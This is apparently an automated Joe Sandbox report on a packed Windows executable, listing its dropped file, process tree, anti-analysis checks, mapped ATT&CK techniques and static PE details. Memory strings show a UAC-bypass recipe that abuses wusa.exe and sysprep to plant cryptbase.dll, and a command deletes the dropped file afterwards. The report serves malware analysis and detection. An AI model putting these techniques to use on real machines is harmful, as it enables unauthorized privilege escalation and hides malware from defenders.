Loading ...

Analysis Report WBKDqSfWLj.exe

Overview

General Information

Joe Sandbox Version:24.0.0
Analysis ID:716914
Start date:19.11.2018
Start time:21:56:02
Joe Sandbox Product:Cloud
Overall analysis duration:0h 5m 24s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:WBKDqSfWLj.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:8
Number of new started drivers analysed:1
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal64.evad.winEXE@5/2@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 98%
  • Number of executed functions: 21
  • Number of non-executed functions: 38
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, rundll32.exe, conhost.exe, svchost.exe

Detection

StrategyScoreRangeReportingDetection
Threshold640 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample might require command line arguments, analyze it with the command line cookbook



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsCommand-Line Interface1Winlogon Helper DLLProcess Injection1Software Packing1Credential DumpingProcess Discovery1Application Deployment SoftwareData from Local SystemData CompressedData Obfuscation
Replication Through Removable MediaService ExecutionPort MonitorsAccessibility FeaturesProcess Injection1Network SniffingSecurity Software Discovery11Remote ServicesData from Removable MediaExfiltration Over Other Network MediumFallback Channels
Drive-by CompromiseWindows Management InstrumentationAccessibility FeaturesPath InterceptionFile Deletion1Input CaptureSystem Information Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic Protocol

Signature Overview

Click to jump to signature section


Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeCode function: 1_2_00DB259B FindFirstFileA,FindClose,1_2_00DB259B
Source: C:\Users\user\AppData\Local\Temp\cnwog.exeCode function: 2_2_00D3259B FindFirstFileA,FindClose,2_2_00D3259B

System Summary:

barindex
Creates mutexesShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeMutant created: \Sessions\2\BaseNamedObjects\Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}
Sample file is different than original file name gathered from version infoShow sources
Source: WBKDqSfWLj.exe, 00000001.00000002.1213976947.009A0000.00000002.sdmpBinary or memory string: System.OriginalFileName vs WBKDqSfWLj.exe
Source: WBKDqSfWLj.exe, 00000001.00000002.1214215571.00A50000.00000008.sdmpBinary or memory string: originalfilename vs WBKDqSfWLj.exe
Source: WBKDqSfWLj.exe, 00000001.00000002.1214215571.00A50000.00000008.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs WBKDqSfWLj.exe
Source: WBKDqSfWLj.exe, 00000001.00000002.1214228725.00A70000.00000008.sdmpBinary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs WBKDqSfWLj.exe
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeFile read: C:\Users\user\Desktop\WBKDqSfWLj.exeJump to behavior
Spawns driversShow sources
Source: unknownDriver loaded: C:\Windows\system32\drivers\WudfPf.sys
Classification labelShow sources
Source: classification engineClassification label: mal64.evad.winEXE@5/2@0/0
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeCode function: 1_2_00DB1C33 CreateToolhelp32Snapshot,Thread32First,CloseHandle,GetCurrentProcessId,OpenThread,SuspendThread,CloseHandle,Thread32Next,GetLastError,CloseHandle,GetLastError,1_2_00DB1C33
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeCode function: 1_2_00DB13D0 FindResourceA,LoadResource,LockResource,1_2_00DB13D0
Creates temporary filesShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeFile created: C:\Users\user~1\AppData\Local\Temp\cnwog.exeJump to behavior
Found command line outputShow sources
Source: C:\Windows\System32\cmd.exeConsole Write: ....................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d...........0.(.O.....V.ZJ....T.0.Q.#v..0......."vd.0.&...`.....,.....Jump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: WBKDqSfWLj.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini filesShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\WBKDqSfWLj.exe 'C:\Users\user\Desktop\WBKDqSfWLj.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\cnwog.exe 'C:\Users\user~1\AppData\Local\Temp\cnwog.exe'
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c del C:\Users\user~1\AppData\Local\Temp\cnwog.exe >> NUL
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeProcess created: C:\Users\user\AppData\Local\Temp\cnwog.exe 'C:\Users\user~1\AppData\Local\Temp\cnwog.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cnwog.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c del C:\Users\user~1\AppData\Local\Temp\cnwog.exe >> NULJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: WBKDqSfWLj.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

barindex
Detected packer (creates a PE file in dynamic memory)Show sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeUnpacked PE file: 1.2.WBKDqSfWLj.exe.400000.1.unpack
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeCode function: 1_2_00DB1903 IsBadReadPtr,LoadLibraryA,GetProcAddress,IsBadReadPtr,1_2_00DB1903

Persistence and Installation Behavior:

barindex
Windows Update Standalone Installer command line found (may be used to bypass UAC)Show sources
Source: WBKDqSfWLj.exeMemory string: .exe /C wusa.exe %s /extract:%%WINDIR%%\system32\sysprep
Source: cnwog.exeMemory string: cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\system32\sysprep
Source: cnwog.exe, 00000002.00000002.1212803884.00D31000.00000020.sdmpMemory string: HvCLIENT32"%s" /exploit"%s" /uacGlobal\AtomFunsysprep.exelogonui.exeutilman.exeuser32.dllwsprintfAwvsprintfAmsvcrt.dll_vscprintf ComSpec/c del %s >> NULGlobal\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}/executable/uac/exploit/runmainadvapi32.dllAddMandatoryAcecmd.exe /C %scmd.exe /C wusa.exe %s /extract:%%WINDIR%%\system32\sysprep\system32\sysprep\cryptbase.dll\system32\sysprep\sysprep.exemakecab.exe /V1 %s %s\cryptbase.msu\cryptbase.dll\%.8x.tmpkernel32.dllIsWow64ProcessWinExecLoadLibraryA.rsrc\uxtheme.dllj
Source: cnwog.exe, 00000002.00000000.1210833158.00D31000.00000020.sdmpMemory string: DTDhD FCLIENT32"%s" /exploit"%s" /uacGlobal\AtomFunsysprep.exelogonui.exeutilman.exeuser32.dllwsprintfAwvsprintfAmsvcrt.dll_vscprintf ComSpec/c del %s >> NULGlobal\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}/executable/uac/exploit/runmainadvapi32.dllAddMandatoryAcecmd.exe /C %scmd.exe /C wusa.exe %s /extract:%%WINDIR%%\system32\sysprep\system32\sysprep\cryptbase.dll\system32\sysprep\sysprep.exemakecab.exe /V1 %s %s\cryptbase.msu\cryptbase.dll\%.8x.tmpkernel32.dllIsWow64ProcessWinExecLoadLibraryA.rsrc\uxtheme.dllj
Drops PE filesShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeFile created: C:\Users\user~1\AppData\Local\Temp\cnwog.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Deletes itself after installationShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c del C:\Users\user~1\AppData\Local\Temp\cnwog.exe >> NUL
Source: C:\Users\user\AppData\Local\Temp\cnwog.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c del C:\Users\user~1\AppData\Local\Temp\cnwog.exe >> NULJump to behavior
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\cnwog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_1-1574
Source: C:\Users\user\AppData\Local\Temp\cnwog.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_2-1405
Found evasive API chain checking for user administrative privilegesShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_1-1411
Source: C:\Users\user\AppData\Local\Temp\cnwog.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_2-1241
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)Show sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeCode function: 1_2_00DB1C33 CreateToolhelp32Snapshot,Thread32First,CloseHandle,GetCurrentProcessId,OpenThread,SuspendThread,CloseHandle,Thread32Next,GetLastError,CloseHandle,GetLastError,1_2_00DB1C33
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-1701
Source: C:\Users\user\AppData\Local\Temp\cnwog.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-1432
Found evasive API chain checking for process token informationShow sources
Source: C:\Users\user\AppData\Local\Temp\cnwog.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-1303
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-1454
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeCode function: 1_2_00DB259B FindFirstFileA,FindClose,1_2_00DB259B
Source: C:\Users\user\AppData\Local\Temp\cnwog.exeCode function: 2_2_00D3259B FindFirstFileA,FindClose,2_2_00D3259B
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: WBKDqSfWLj.exe, 00000001.00000002.1212775221.00470000.00000004.sdmpBinary or memory string: vmbusres.dll/
Source: WBKDqSfWLj.exe, 00000001.00000002.1212775221.00470000.00000004.sdmpBinary or memory string: vmbusres.dll/:2m
Program exit pointsShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeAPI call chain: ExitProcess graph end nodegraph_1-1565
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeAPI call chain: ExitProcess graph end nodegraph_1-1399
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeAPI call chain: ExitProcess graph end nodegraph_1-1445
Source: C:\Users\user\AppData\Local\Temp\cnwog.exeAPI call chain: ExitProcess graph end nodegraph_2-1229
Source: C:\Users\user\AppData\Local\Temp\cnwog.exeAPI call chain: ExitProcess graph end nodegraph_2-1275

Anti Debugging:

barindex
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)Show sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeCode function: 1_2_00DB1C33 CreateToolhelp32Snapshot,Thread32First,CloseHandle,GetCurrentProcessId,OpenThread,SuspendThread,CloseHandle,Thread32Next,GetLastError,CloseHandle,GetLastError,1_2_00DB1C33
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeCode function: 1_2_00DB1903 IsBadReadPtr,LoadLibraryA,GetProcAddress,IsBadReadPtr,1_2_00DB1903
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeCode function: 1_2_00DB3E80 mov eax, dword ptr fs:[00000030h]1_2_00DB3E80
Source: C:\Users\user\AppData\Local\Temp\cnwog.exeCode function: 2_2_00D33E80 mov eax, dword ptr fs:[00000030h]2_2_00D33E80

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeProcess created: C:\Users\user\AppData\Local\Temp\cnwog.exe 'C:\Users\user~1\AppData\Local\Temp\cnwog.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cnwog.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c del C:\Users\user~1\AppData\Local\Temp\cnwog.exe >> NULJump to behavior
Contains functionality to add an ACL to a security descriptorShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeCode function: 1_2_00DB2604 AllocateAndInitializeSid,_memset,GetModuleHandleA,SetEntriesInAclA,LocalAlloc,LocalAlloc,LocalFree,_memset,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,LoadLibraryA,GetProcAddress,LocalAlloc,InitializeAcl,AllocateAndInitializeSid,SetSecurityDescriptorSacl,GetLastError,FreeSid,GetLastError,LocalFree,GetLastError,GetLastError,LocalFree,GetLastError,LocalFree,GetLastError,FreeSid,GetLastError,1_2_00DB2604
Contains functionality to create a new security descriptorShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeCode function: 1_2_00DB2604 AllocateAndInitializeSid,_memset,GetModuleHandleA,SetEntriesInAclA,LocalAlloc,LocalAlloc,LocalFree,_memset,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,LoadLibraryA,GetProcAddress,LocalAlloc,InitializeAcl,AllocateAndInitializeSid,SetSecurityDescriptorSacl,GetLastError,FreeSid,GetLastError,LocalFree,GetLastError,GetLastError,LocalFree,GetLastError,LocalFree,GetLastError,FreeSid,GetLastError,1_2_00DB2604

Language, Device and Operating System Detection:

barindex
Contains functionality to query windows versionShow sources
Source: C:\Users\user\Desktop\WBKDqSfWLj.exeCode function: 1_2_00DB29C6 _memset,GetVersionExA,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,CloseHandle,CloseHandle,GetTokenInformation,CreateWellKnownSid,CheckTokenMembership,GetLastError,CloseHandle,IsUserAnAdmin,CloseHandle,GetLastError,IsUserAnAdmin,1_2_00DB29C6

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 716914 Sample: WBKDqSfWLj.exe Startdate: 19/11/2018 Architecture: WINDOWS Score: 64 20 Windows Update Standalone Installer command line found (may be used to bypass UAC) 2->20 22 Deletes itself after installation 2->22 7 WBKDqSfWLj.exe 2 2->7         started        11 WudfPf.sys 2->11         started        process3 file4 18 C:\Users\user~1\AppData\Local\...\cnwog.exe, PE32 7->18 dropped 24 Detected packer (creates a PE file in dynamic memory) 7->24 26 Found evasive API chain (may stop execution after checking mutex) 7->26 28 Found evasive API chain checking for user administrative privileges 7->28 13 cnwog.exe 7->13         started        signatures5 process6 signatures7 30 Found evasive API chain (may stop execution after checking mutex) 13->30 32 Deletes itself after installation 13->32 34 Found evasive API chain checking for user administrative privileges 13->34 16 cmd.exe 13->16         started        process8

Simulations

Behavior and APIs

TimeTypeDescription
21:56:14API Interceptor1x Sleep call for process: WBKDqSfWLj.exe modified
21:56:14API Interceptor1x Sleep call for process: cnwog.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Startup

  • System is w7_1
  • WBKDqSfWLj.exe (PID: 1628 cmdline: 'C:\Users\user\Desktop\WBKDqSfWLj.exe' MD5: B46BFD40F6379DB41AC99FF3103D81B9)
    • cnwog.exe (PID: 1840 cmdline: 'C:\Users\user~1\AppData\Local\Temp\cnwog.exe' MD5: 658965F6B9EFC9114BA4EB2C7DBC85E8)
      • cmd.exe (PID: 2920 cmdline: C:\Windows\system32\cmd.exe /c del C:\Users\user~1\AppData\Local\Temp\cnwog.exe >> NUL MD5: AD7B9C14083B52BC532FBA5948342B98)
  • WudfPf.sys (PID: 4 cmdline: unknown MD5: 06E6F32C8D0A3F66D956F57B43A2E070)
  • cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\cnwog.exe
Process:C:\Users\user\Desktop\WBKDqSfWLj.exe
File Type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):22542
Entropy (8bit):6.0729426879035495
Encrypted:false
MD5:658965F6B9EFC9114BA4EB2C7DBC85E8
SHA1:10CB98E5E3EA977B35E00C3535938B6FEF302D15
SHA-256:462E248196E3D46D222D5B95AA2AE4433AE5F1DD418D80A4BB326E5A67D02908
SHA-512:21B9A6E3F7FB76276881962BB29999E84D00CBF8E4DFC9282F91C5A295F5430609757D336BA9657F024A2F8DD74A2379D65770456C77976351B165DFB46F38A1
Malicious:true
Reputation:low
\Device\Null
Process:C:\Windows\System32\cmd.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):48
Entropy (8bit):4.605388542207535
Encrypted:false
MD5:6E7658E1F23E564517BA9DAAB4E630E6
SHA1:59DB5A68927447352D873DB53C772AAA8F7469CF
SHA-256:AF2A102EFE06A8140E57C8C8030C6D69818FB3BD5B18FA78D1AC9A2663E958EC
SHA-512:F40DBB9285C42865187F6F08A9DB8E0B40BFEFB7DB189C444EFC85A9CCBFEA31C3CD1948691D622FAC33F9FEA834683C58E02DE527A7CF69CF0DA6C8FFA9DD52
Malicious:false
Reputation:low

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

Static File Info

General

File type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit):6.078333712055946
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:WBKDqSfWLj.exe
File size:22456
MD5:b46bfd40f6379db41ac99ff3103d81b9
SHA1:6d1027120c6c247c1ac85c759456c7e351ac4e43
SHA256:19a962538a6b7b96a33360530a875df7a07f42d3d72a5904485405e236be0ffc
SHA512:d88bfcd7a94db635818067bc18e0e1f4849b5a7e66ca8505e8004c7c1a3c858b2f9baff8d0c6f5894fd6c5f1226f9712ec3a78d2f233a9da015acd44867758ac
SSDEEP:384:6B7H4slp4mvFw8hkt2C8oBl/MCyaZAR3rfD8G0r1wk3qeEW0/T8w/fF:6B7HBXFw82t2C80lyaZ4jX05Rfw/9
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ..Mdg..dg..dg..C...fg..m.Y.mg..dg..=g....`.ag....T.lg....a.hg....P.eg....W.eg..Richdg..................PE..L......S...........

File Icon

Icon Hash:aab2e3e39383aa00

Static PE Info

General

Entrypoint:0x401fb2
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x53D8C5B8 [Wed Jul 30 10:15:20 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:719981e4a07a182166e9d536a1267a59

Entrypoint Preview

Instruction
push esi
mov esi, dword ptr [esp+08h]
push 00000002h
push esi
call dword ptr [004010ECh]
test eax, eax
jne 1BD7EDF2h
mov eax, 00005A4Dh
cmp word ptr [esi], ax
jne 1BD7EDE8h
mov eax, dword ptr [esp+0Ch]
cmp eax, 01h
je 1BD7EDD0h
test eax, eax
je 1BD7EDCCh
cmp eax, 02h
je 1BD7EDC7h
cmp eax, 03h
jne 1BD7EDD1h
push dword ptr [esp+10h]
push eax
push esi
call 1BD7EC6Eh
pop esi
retn 000Ch
call 1BD7EAA6h
push eax
call dword ptr [0040106Ch]
int3
mov eax, dword ptr [esp+04h]
xor ecx, ecx
mov dword ptr [00405030h], eax
inc ecx
mov eax, 00405030h
push esi
mov edx, dword ptr [eax]
mov esi, edx
shr esi, 1Eh
xor esi, edx
imul esi, esi, 6C078965h
add esi, ecx
mov dword ptr [eax+04h], esi
add eax, 04h
inc ecx
cmp eax, 004059ECh
jl 1BD7EDA3h
mov dword ptr [00405020h], ecx
pop esi
retn 0004h
cmp dword ptr [004059F0h], 00000000h
jne 1BD7EDDEh
push 004011C0h
push 004011B4h
call dword ptr [004010F0h]
push eax
call dword ptr [004010F4h]
mov dword ptr [004059F0h], eax
ret
cmp dword ptr [004059F4h], 00000000h
jne 1BD7EDDEh
push 004011CCh

Rich Headers

Programming Language:
  • [LNK] VS2010 build 30319
  • [ASM] VS2010 build 30319
  • [IMP] VS2005 build 50727
  • [ C ] VS2010 build 30319
  • [C++] VS2010 build 30319
  • [RES] VS2010 build 30319
  • [IMP] VS2008 SP1 build 30729

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x3eac0x78.text
IMAGE_DIRECTORY_ENTRY_RESOURCE0x70000xa58.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000x2a4.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x10000x158.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x36600x3800False0.588936941964ump; data6.37760206704IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data0x50000xa240x200False0.0703125ump; data0.199775656087IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.CRT0x60000x40x200False0.03125ump; Non-ISO extended-ASCII text, with no line terminators0.0611628522412IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc0x70000xa580xc00False0.792643229167ump; data6.85564450142IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x80000x3f80x400False0.634765625ump; data5.0141806425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountry
RT_RCDATA0x72200x834ump; dataEnglishUnited States
RT_MANIFEST0x70c00x15cump; ASCII text, with CRLF line terminatorsEnglishUnited States

Imports

DLLImport
KERNEL32.dllOpenThread, CloseHandle, Thread32First, CreateToolhelp32Snapshot, LocalFree, Sleep, GetModuleFileNameA, GetModuleHandleA, GetCommandLineA, GetCurrentProcess, GetVersionExA, SetEvent, OpenEventA, ExitProcess, GetCurrentProcessId, LocalAlloc, WinExec, lstrcatA, GetEnvironmentVariableA, GetShortPathNameA, CreateMutexA, SuspendThread, GetTickCount, FlushFileBuffers, WriteFile, CreateFileA, ReadFile, GetFileSize, FindClose, FindFirstFileA, GetExitCodeProcess, WaitForSingleObject, CreateProcessA, Process32Next, Process32First, GetStartupInfoA, GetWindowsDirectoryA, DeleteFileA, GetSystemDirectoryA, GetTempPathA, CopyFileA, CreateEventA, MoveFileA, Thread32Next, FreeLibrary, IsBadReadPtr, LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, VirtualQuery, GetLastError, FindResourceA, LoadResource, GetCommandLineW, LockResource, IsProcessorFeaturePresent
USER32.dllLockWorkStation, UnregisterClassA, wsprintfA, RegisterWindowMessageA, GetClipboardFormatNameA, RegisterClassExA, SendInput
ADVAPI32.dllOpenProcessToken, AllocateAndInitializeSid, SetEntriesInAclA, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, InitializeAcl, SetSecurityDescriptorSacl, FreeSid, GetTokenInformation, GetSidSubAuthority, GetSidSubAuthorityCount, CheckTokenMembership, CreateWellKnownSid
SHELL32.dllCommandLineToArgvW
imagehlp.dllCheckSumMappedFile

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

No network behavior found

Code Manipulations

IRP Handler

Handler FunctionDriverAddressType
IRP_MJ_QUERY_VOLUME_INFORMATION\Driver\WudfPf94B968CCnew
IRP_MJ_WRITE\Driver\WudfPf94B968CCnew
IRP_MJ_SYSTEM_CONTROL\Driver\WudfPf94B968CCnew
IRP_MJ_CREATE_NAMED_PIPE\Driver\WudfPf94B968CCnew
IRP_MJ_POWER\Driver\WudfPf94B968CCnew
IRP_MJ_SET_EA\Driver\WudfPf94B968CCnew
IRP_MJ_QUERY_QUOTA\Driver\WudfPf94B968CCnew
IRP_MJ_DEVICE_CHANGE\Driver\WudfPf94B968CCnew
IRP_MJ_CLOSE\Driver\WudfPf94B968CCnew
IRP_MJ_READ\Driver\WudfPf94B968CCnew
IRP_MJ_SET_VOLUME_INFORMATION\Driver\WudfPf94B968CCnew
IRP_MJ_FILE_SYSTEM_CONTROL\Driver\WudfPf94B968CCnew
IRP_MJ_QUERY_SECURITY\Driver\WudfPf94B968CCnew
IRP_MJ_DEVICE_CONTROL\Driver\WudfPf94B968CCnew
IRP_MJ_DIRECTORY_CONTROL\Driver\WudfPf94B968CCnew
IRP_MJ_PNP\Driver\WudfPf94B968CCnew
IRP_MJ_SET_INFORMATION\Driver\WudfPf94B968CCnew
IRP_MJ_CREATE_MAILSLOT\Driver\WudfPf94B968CCnew
IRP_MJ_SHUTDOWN\Driver\WudfPf94B968CCnew
IRP_MJ_SET_QUOTA\Driver\WudfPf94B968CCnew
IRP_MJ_SET_SECURITY\Driver\WudfPf94B968CCnew
IRP_MJ_CREATE\Driver\WudfPf94B968CCnew
IRP_MJ_INTERNAL_DEVICE_CONTROL\Driver\WudfPf94B968CCnew
IRP_MJ_QUERY_INFORMATION\Driver\WudfPf94B968CCnew
IRP_MJ_LOCK_CONTROL\Driver\WudfPf94B968CCnew
IRP_MJ_FLUSH_BUFFERS\Driver\WudfPf94B968CCnew
IRP_MJ_QUERY_EA\Driver\WudfPf94B968CCnew
IRP_MJ_CLEANUP\Driver\WudfPf94B968CCnew

New Device

DriverDeviceAttached to (upper)Attached to (lower)
\Driver\WudfPf\Device\ProcessManagementunknownunknown
\Driver\WudfPf\Device\WUDFLpcDeviceunknownunknown

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Start time:21:56:13
Start date:19/11/2018
Path:C:\Users\user\Desktop\WBKDqSfWLj.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\WBKDqSfWLj.exe'
Imagebase:0xdb0000
